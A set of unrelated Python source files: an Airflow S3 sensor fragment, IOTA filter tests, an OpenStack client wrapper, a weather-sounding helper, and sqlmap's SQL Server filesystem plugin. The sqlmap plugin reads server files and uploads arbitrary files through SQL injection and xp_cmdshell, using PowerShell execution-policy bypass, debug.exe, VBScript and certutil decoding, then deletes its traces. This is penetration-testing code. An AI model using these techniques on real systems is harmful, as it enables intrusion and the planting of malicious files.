url, please leave bucket_name as `None`.
:type bucket_key: str
:param bucket_name: Name of the S3 bucket. Only needed when ``bucket_key``
is not provided as a full s3:// url.
:type bucket_name: str
:param wildcard_match: whether the bucket_key should be interpreted as a
Unix wildcard pattern
:type wildcard_match: bool
:param aws_conn_id: a reference to the s3 connection
:type aws_conn_id: str
:param verify: Whether or not to verify SSL certificates for S3 connection.
By default SSL certificates are verified.
You can provide the following values:
- ``False``: do not validate SSL certificates. SSL will still be used
(unless use_ssl is False), but SSL certificates will not be
verified.
        - ``path/to/cert/bundle.pem``: A filename of the CA cert bundle to use.
You can specify this argument if you want to use a different
CA cert bundle than the one used by botocore.
:type verify: bool or str
"""
template_fields = ('bucket_key', 'bucket_name')
@apply_defaults
def __init__(self,
bucket_key,
bucket_name=None,
wildcard_match=False,
aws_conn_id='aws_default',
verify=None,
*args,
**kwargs):
super().__init__(*args, **kwargs)
# Parse
if bucket_name is None:
parsed_url = urlparse(bucket_key)
if parsed_url.netloc == '':
raise AirflowException('Please provide a bucket_name')
else:
bucket_name = parsed_url.netloc
bucket_key = parsed_url.path.lstrip('/')
else:
parsed_url = urlparse(bucket_key)
if parsed_url.scheme != '' or parsed_url.netloc != '':
raise AirflowException('If bucket_name is provided, bucket_key' +
' should be relative path from root' +
' level, rather than a full s3:// url')
self.bucket_name = bucket_name
self.bucket_key = bucket_key
self.wildcard_match = wildcard_match
self.aws_conn_id = aws_conn_id
self.verify = verify
def poke(self, context):
from airflow.providers.amazon.aws.hooks.s3 import S3Hook
hook = S3Hook(aws_conn_id=self.aws_conn_id, verify=self.verify)
self.log.info('Poking for key : s3://%s/%s', self.bucket_name, self.bucket_key)
if self.wildcard_match:
return hook.check_for_wildcard_key(self.bucket_key,
self.bucket_name)
return hook.check_for_key(self.bucket_key, self.bucket_name)
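# A minimal usage sketch (hedged: task id, bucket key and the ``dag`` object
# below are illustrative assumptions, not part of this module):
#
#     wait_for_key = S3KeySensor(
#         task_id='wait_for_key',
#         bucket_key='s3://my-bucket/path/to/file.csv',
#         wildcard_match=False,
#         aws_conn_id='aws_default',
#         dag=dag,
#     )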
|
import filters as f
from filters.test import BaseFilterTestCase
from iota import Address, TransactionHash, TryteString
from iota.filters import AddressNoChecksum, GeneratedAddress, NodeUri, Trytes
class GeneratedAddressTestCase(BaseFilterTestCase):
filter_type = GeneratedAddress
def test_pass_none(self):
"""
``None`` always passes this filter.
Use ``Required | GeneratedAddress`` to reject null values.
"""
self.assertFilterPasses(None)
def test_pass_happy_path(self):
"""
Incoming value has correct type and attributes.
"""
self.assertFilterPasses(Address(b'', key_index=42, security_level=2))
def test_fail_key_index_null(self):
"""
Incoming value does not have ``key_index`` set.
"""
self.assertFilterErrors(
Address(b'', security_level=2),
[GeneratedAddress.CODE_NO_KEY_INDEX],
)
def test_fail_security_level_null(self):
"""
Incoming value does not have ``security_level`` set.
"""
self.assertFilterErrors(
Address(b'', key_index=2),
[GeneratedAddress.CODE_NO_SECURITY_LEVEL],
)
def test_fail_wrong_type(self):
"""
Incoming value is not an :py:class:`Address` instance.
"""
self.assertFilterErrors(
# The only way to ensure ``key_index`` is set is to require that
# the incoming value is an :py:class:`Address` instance.
b'TESTVALUE9DONTUSEINPRODUCTION99999WJ9PCA'
b'RBOSBIMNTGDYKUDYYFJFGZOHORYSQPCWJRKHIOVIY',
[f.Type.CODE_WRONG_TYPE],
)
class NodeUriTestCase(BaseFilterTestCase):
filter_type = NodeUri
def test_pass_none(self):
"""
``None`` always passes this filter.
Use ``Required | NodeUri`` to reject null values.
"""
self.assertFilterPasses(None)
def test_pass_udp(self):
"""
The incoming value is a valid UDP URI.
"""
self.assertFilterPasses('udp://localhost:14265/node')
def test_pass_tcp(self):
"""
The incoming value is a valid TCP URI.
https://github.com/iotaledger/iota.py/issues/111
"""
self.assertFilterPasses('tcp://localhost:14265/node')
def test_fail_not_a_uri(self):
"""
The incoming value is not a URI.
Note: Internally, the filter uses ``resolve_adapter``, which has its
own unit tests. We won't duplicate them here; a simple smoke
check should suffice.
References:
- :py:class:`test.adapter_test.ResolveAdapterTestCase`
"""
self.assertFilterErrors(
'not a valid uri',
[NodeUri.CODE_NOT_NODE_URI],
)
def test_fail_bytes(self):
"""
To ensure consistent behavior in Python 2 and 3, bytes are not
accepted.
"""
self.assertFilterErrors(
b'udp://localhost:14265/node',
[f.Type.CODE_WRONG_TYPE],
)
def test_fail_wrong_type(self):
"""
The incoming value is not a string.
"""
self.assertFilterErrors(
# Use ``FilterRepeater(NodeUri)`` to validate a sequence of URIs.
['udp://localhost:14265/node'],
[f.Type.CODE_WRONG_TYPE],
)
class TrytesTestCase(BaseFilterTestCase):
filter_type = Trytes
def test_pass_none(self):
"""
``None`` always passes this filter.
Use ``Required | Trytes`` to reject null values.
"""
self.assertFilterPasses(None)
def test_pass_ascii(self):
"""
The incoming value is ASCII.
"""
trytes = b'RBTC9D9DCDQAEASBYBCCKBFA'
filter_ = self._filter(trytes)
self.assertFilterPasses(filter_, trytes)
self.assertIsInstance(filter_.cleaned_data, TryteString)
def test_pass_bytearray(self):
"""
The incoming value is a bytearray.
"""
trytes = bytearray(b'RBTC9D9DCDQAEASBYBCCKBFA')
filter_ = self._filter(trytes)
self.assertFilterPasses(filter_, trytes)
self.assertIsInstance(filter_.cleaned_data, TryteString)
def test_pass_tryte_string(self):
"""
The incoming value is a TryteString.
"""
trytes = TryteString(b'RBTC9D9DCDQAEASBYBCCKBFA')
filter_ = self._filter(trytes)
self.assertFilterPasses(filter_, trytes)
self.assertIsInstance(filter_.cleaned_data, TryteString)
def test_pass_alternate_result_type(self):
"""
Configuring the filter to return a specific type.
"""
input_trytes = b'RBTC9D9DCDQAEASBYBCCKBFA'
result_trytes = (
b'RBTC9D9DCDQAEASBYBCCKBFA9999999999999999'
b'99999999999999999999999999999999999999999'
)
filter_ = self._filter(input_trytes, result_type=TransactionHash)
self.assertFilterPasses(filter_, result_trytes)
self.assertIsInstance(filter_.cleaned_data, TransactionHash)
def test_fail_not_trytes(self):
"""
The incoming value contains an invalid character.
Note: Internally, the filter uses :py:class:`TryteString`, which has
its own unit tests. We won't duplicate them here; a simple smoke
check should suffice.
References:
- :py:class:`test.types_test.TryteStringTestCase`
"""
self.assertFilterErrors(
# Everyone knows there's no such thing as "8"!
b'RBTC9D9DCDQAEASBYBCCKBFA8',
[Trytes.CODE_NOT_TRYTES],
)
def test_fail_alternate_result_type(self):
"""
The incoming value is a valid tryte sequence, but the filter is
configured for a specific type with stricter validation.
"""
trytes = (
# Ooh, just a little bit too long there.
b'RBTC9D9DCDQAEASBYBCCKBFA99999999999999999'
b'99999999999999999999999999999999999999999'
)
self.assertFilterErrors(
self._filter(trytes, result_type=TransactionHash),
[Trytes.CODE_WRONG_FORMAT],
)
def test_fail_wrong_type(self):
"""
The incoming value has an incompatible type.
"""
self.assertFilterErrors(
# Use ``FilterRepeater(Trytes)`` to validate a sequence of tryte
# representations.
[TryteString(b'RBTC9D9DCDQAEASBYBCCKBFA')],
[f.Type.CODE_WRONG_TYPE],
)
class AddressNoChecksumTestCase(BaseFilterTestCase):
filter_type = AddressNoChecksum
def setUp(self):
super(AddressNoChecksumTestCase, self).setUp()
# Define some addresses that we can reuse between tests
self.tryte1 = (
b'TESTVALUE9DONTUSEINPRODUCTION99999FBFFTG'
b'QFWEHEL9KCAFXBJBXGE9HID9XCOHFIDABHDG9AHDR'
)
self.checksum = b'ENXYJOBP9'
self.address = Address(self.tryte1)
self.address_with_checksum = Address(self.tryte1 + self.checksum)
self.address_with_bad_checksum = Address(self.tryte1 + b'DEADBEEF9')
def test_pass_no_checksum_addy(self):
"""
Incoming value is tryte in address form or Address object.
"""
self.assertFilterPasses(self.tryte1)
self.assertFilterPasses(self.address)
def test_pass_with_checksum_addy(self):
"""
After passing through the filter an address with a checksum should
return the address without.
"""
self.assertFilterPasses(self.address_with_checksum, self.address)
def test_fail_with_bad_checksum_addy(self):
"""
If they've got a bad checksum in their address we should probably
tell them, so they don't wonder why something works in one place and
not another.
"""
self.assertFilterErrors(
self.address_with_bad_checksum,
[AddressNoChecksum.ADDRESS_BAD_CHECKSUM])
|
import urlparse
try:
from keystoneclient.v2_0 import client as keystone_client
#from glance import client as glance_client
import glanceclient
from novaclient.v1_1 import client as nova_client
from neutronclient.v2_0 import client as quantum_client
has_openstack = True
except:
has_openstack = False
from xos.config import Config
def require_enabled(callable):
def wrapper(*args, **kwds):
if has_openstack:
return callable(*args, **kwds)
else:
return None
return wrapper
def parse_novarc(filename):
opts = {}
f = open(filename, 'r')
for line in f:
try:
line = line.replace('export', '').strip()
parts = line.split('=')
if len(parts) > 1:
value = parts[1].replace("\'", "")
value = value.replace('\"', '')
opts[parts[0]] = value
except:
pass
f.close()
return opts
class Client:
def __init__(self, username=None, password=None, tenant=None, url=None, token=None, endpoint=None, controller=None, cacert=None, admin=True, *args, **kwds):
self.has_openstack = has_openstack
self.url = controller.auth_url
if admin:
self.username = controller.admin_user
self.password = controller.admin_password
self.tenant = controller.admin_tenant
else:
self.username = None
self.password = None
self.tenant = None
if username:
self.username = username
if password:
self.password = password
if tenant:
self.tenant = tenant
if url:
self.url = url
if token:
self.token = token
if endpoint:
self.endpoint = endpoint
self.cacert = cacert
#if '@' in self.username:
# self.username = self.username[:self.username.index('@')]
class KeystoneClient(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = keystone_client.Client(username=self.username,
password=self.password,
tenant_name=self.tenant,
auth_url=self.url
)
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class Glance(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = glanceclient.get_client(host='0.0.0.0',
username=self.username,
password=self.password,
tenant=self.tenant,
auth_url=self.url)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class GlanceClient(Client):
def __init__(self, version, endpoint, token, cacert=None, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = glanceclient.Client(version,
endpoint=endpoint,
token=token,
cacert=cacert
)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class NovaClient(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = nova_client.Client(username=self.username,
api_key=self.password,
project_id=self.tenant,
auth_url=self.url,
region_name='',
extensions=[],
service_type='compute',
service_name='',
)
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class NovaDB(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.ctx = get_admin_context()
nova_db_api.FLAGS(default_config_files=['/etc/nova/nova.conf'])
self.client = nova_db_api
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class QuantumClient(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = quantum_client.Client(username=self.username,
password=self.password,
tenant_name=self.tenant,
auth_url=self.url,
ca_cert=self.cacert)
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class OpenStackClient:
"""
A simple native shell to the openstack backend services.
This class can receive all nova calls to the underlying testbed
"""
def __init__ ( self, *args, **kwds) :
# instantiate managers
self.keystone = KeystoneClient(*args, **kwds)
url_parsed = urlparse.urlparse(self.keystone.url)
hostname = url_parsed.netloc.split(':')[0]
token = self.keystone.client.tokens.authenticate(username=self.keystone.username, password=self.keystone.password, tenant_name=self.keystone.tenant)
glance_endpoint = self.keystone.service_catalog.url_for(service_type='image', endpoint_type='publicURL')
self.glanceclient = GlanceClient('1', endpoint=glance_endpoint, token=token.id, **kwds)
self.nova = NovaClient(*args, **kwds)
# self.nova_db = NovaDB(*args, **kwds)
self.quantum = QuantumClient(*args, **kwds)
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def authenticate(self):
return self.keystone.authenticate()
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import ntpath
import os
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.convert import base64encode
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def _dataToScr(self, fileContent, chunkName):
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = ""
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = hexencode(lineChar)
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar)
else:
scrString += " %s" % strLineChar
lineAddr += len(lineChar)
fileLines.append(scrString)
fileLines.append("w")
fileLines.append("q")
return fileLines
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
return chunkName
def stackedReadFile(self, rFile):
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%shex" % self.fileTblName
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % rFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
DECLARE @length INT
DECLARE @chunk INT
SET @charset = '0123456789ABCDEF'
SET @counter = 1
SET @hexstr = ''
SET @length = (SELECT DATALENGTH(%s) FROM %s)
SET @chunk = 1024
WHILE (@counter <= @length)
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
SET @firstint = floor(@tempint/16)
SET @secondint = @tempint - (@firstint * 16)
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
SET @counter = @counter + 1
IF @counter %% @chunk = 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
SET @hexstr = ''
END
END
IF @counter %% (@chunk) != 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
return result
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s'" % dFile
logger.info(infoMsg)
encodedFileContent = base64encode(wFileContent)
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File)
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
randPSScriptPath = "%s\%s" % (tmpPath, randPSScript)
wFileSize = len(encodedFileContent)
chunkMaxSize = 1024
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
for i in xrange(0, wFileSize, chunkMaxSize):
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile
logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)
commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % encodedBase64FilePath,
"del /F /Q \"%s\"" % randPSScriptPath)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00
if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
debugMsg += "it chunk by chunk and recreate the original file "
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
for i in xrange(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(wFileChunk, tmpPath)
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName)
else:
debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s"
outputFilePath = "%s"
Set fs = CreateObject("Scripting.FileSystemObject")
Set file = fs.GetFile(inputFilePath)
If file.Size Then
Wscript.Echo "Loading from: " & inputFilePath
Wscript.Echo
Set fd = fs.OpenTextFile(inputFilePath, 1)
data = fd.ReadAll
fd.Close
data = Replace(data, " ", "")
data = Replace(data, vbCr, "")
data = Replace(data, vbLf, "")
Wscript.Echo "Fixed Input: "
Wscript.Echo data
Wscript.Echo
decodedData = base64_decode(data)
Wscript.Echo "Output: "
Wscript.Echo decodedData
Wscript.Echo
Wscript.Echo "Writing output in: " & outputFilePath
Wscript.Echo
Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
ofs.Write decodedData
ofs.close
Else
Wscript.Echo "The file is empty."
End If
Function base64_decode(byVal strIn)
Dim w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 4
w1 = mimedecode(Mid(strIn, n, 1))
w2 = mimedecode(Mid(strIn, n + 1, 1))
w3 = mimedecode(Mid(strIn, n + 2, 1))
w4 = mimedecode(Mid(strIn, n + 3, 1))
If Not w2 Then _
strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
If Not w3 Then _
strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
If Not w4 Then _
strOut = strOut + Chr(((w3 * 64 + w4) And 255))
Next
base64_decode = strOut
End Function
Function mimedecode(byVal strIn)
Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If Len(strIn) = 0 Then
mimedecode = -1 : Exit Function
Else
mimedecode = InStr(Base64Chars, strIn) - 1
End If
End Function""" % (randFilePath, dFile)
vbs = vbs.replace(" ", "")
encodedFileContent = base64encode(wFileContent)
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
chunkMaxSize = 500
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
encodedFileContent = base64encode(wFileContent)
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
logger.debug("decoding the file to %s.." % dFile)
commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile),
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath)
dFile = posixToNtSlashes(dFile)
with open(wFile, "rb") as f:
wFileContent = f.read()
self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "the custom Visual Basic script technique? [Y/n] "
if readInput(message, default='Y', boolean=True):
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in debug.exe technique? [Y/n] "
if readInput(message, default='Y', boolean=True):
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in certutil.exe technique? [Y/n] "
if readInput(message, default='Y', boolean=True):
self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
return written
|
# #
# #
#
# Classes for retrieving soundings based on gridded data from the Data Access
# Framework
#
#
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# 06/24/15 #4480 dgilling Initial Creation.
#
from collections import defaultdict
from shapely.geometry import Point
from awips import DateTimeConverter
from awips.dataaccess import DataAccessLayer
from dynamicserialize.dstypes.com.raytheon.uf.common.time import DataTime
from dynamicserialize.dstypes.com.raytheon.uf.common.dataplugin.level import Level
def getSounding(modelName, weatherElements, levels, samplePoint, refTime=None, timeRange=None):
""""
Performs a series of Data Access Framework requests to retrieve a sounding object
based on the specified request parameters.
Args:
modelName: the grid model datasetid to use as the basis of the sounding.
weatherElements: a list of parameters to return in the sounding.
levels: a list of levels to sample the given weather elements at
samplePoint: a lat/lon pair to perform the sampling of data at.
refTime: (optional) the grid model reference time to use for the sounding.
If not specified, the latest ref time in the system will be used.
timeRange: (optional) a TimeRange to specify which forecast hours to use.
If not specified, will default to all forecast hours.
Returns:
        A _SoundingCube instance, which acts as a 3-tiered dictionary, keyed
by DataTime, then by level and finally by weather element. If no
data is available for the given request parameters, None is returned.
"""
(locationNames, parameters, levels, envelope, refTime, timeRange) = \
__sanitizeInputs(modelName, weatherElements, levels, samplePoint, refTime, timeRange)
requestArgs = { 'datatype' : 'grid',
'locationNames' : locationNames,
'parameters' : parameters,
'levels' : levels,
'envelope' : envelope,
}
req = DataAccessLayer.newDataRequest(**requestArgs)
forecastHours = __determineForecastHours(req, refTime, timeRange)
if not forecastHours:
return None
response = DataAccessLayer.getGeometryData(req, forecastHours)
soundingObject = _SoundingCube(response)
return soundingObject
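# A minimal usage sketch (hedged: the model name, parameters, levels and the
# sample point below are illustrative assumptions, not values defined here):
#
#     cube = getSounding('GFS40', ['T', 'RH'], ['500MB', '700MB'],
#                        (-83.81, 39.82))
#     if cube is not None:
#         for time_ in cube.times():
#             print(cube[time_]['500MB']['T'])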
def setEDEXHost(host):
"""
Changes the EDEX host the Data Access Framework is communicating with.
Args:
host: the EDEX host to connect to
"""
if host:
DataAccessLayer.changeEDEXHost(str(host))
def __sanitizeInputs(modelName, weatherElements, levels, samplePoint, refTime, timeRange):
locationNames = [str(modelName)]
parameters = __buildStringList(weatherElements)
levels = __buildStringList(levels)
envelope = Point(samplePoint)
if refTime is not None:
refTime = DataTime(refTime=DateTimeConverter.convertToDateTime(refTime))
if timeRange is not None:
timeRange = DateTimeConverter.constructTimeRange(*timeRange)
return (locationNames, parameters, levels, envelope, refTime, timeRange)
def __determineForecastHours(request, refTime, timeRange):
dataTimes = DataAccessLayer.getAvailableTimes(request, False)
timesGen = [(DataTime(refTime=dataTime.getRefTime()), dataTime) for dataTime in dataTimes]
dataTimesMap = defaultdict(list)
for baseTime, dataTime in timesGen:
dataTimesMap[baseTime].append(dataTime)
if refTime is None:
refTime = max(dataTimesMap.keys())
forecastHours = dataTimesMap[refTime]
if timeRange is None:
return forecastHours
else:
return [forecastHour for forecastHour in forecastHours if timeRange.contains(forecastHour.getValidPeriod())]
def __buildStringList(param):
if __notStringIter(param):
return [str(item) for item in param]
else:
return [str(param)]
def __notStringIter(iterable):
if not isinstance(iterable, str):
try:
iter(iterable)
return True
except TypeError:
return False
class _SoundingCube(object):
"""
The top-level sounding object returned when calling SoundingsSupport.getSounding.
This object acts as a 3-tiered dict which is keyed by time then level
then parameter name. Calling times() will return all valid keys into this
object.
"""
def __init__(self, geometryDataObjects):
self._dataDict = {}
self._sortedTimes = []
if geometryDataObjects:
for geometryData in geometryDataObjects:
dataTime = geometryData.getDataTime()
level = geometryData.getLevel()
for parameter in geometryData.getParameters():
self.__addItem(parameter, dataTime, level, geometryData.getNumber(parameter))
def __addItem(self, parameter, dataTime, level, value):
timeLayer = self._dataDict.get(dataTime, _SoundingTimeLayer(dataTime))
self._dataDict[dataTime] = timeLayer
timeLayer._addItem(parameter, level, value)
if dataTime not in self._sortedTimes:
self._sortedTimes.append(dataTime)
self._sortedTimes.sort()
def __getitem__(self, key):
return self._dataDict[key]
def __len__(self):
return len(self._dataDict)
def times(self):
"""
Returns the valid times for this sounding.
Returns:
A list containing the valid DataTimes for this sounding in order.
"""
return self._sortedTimes
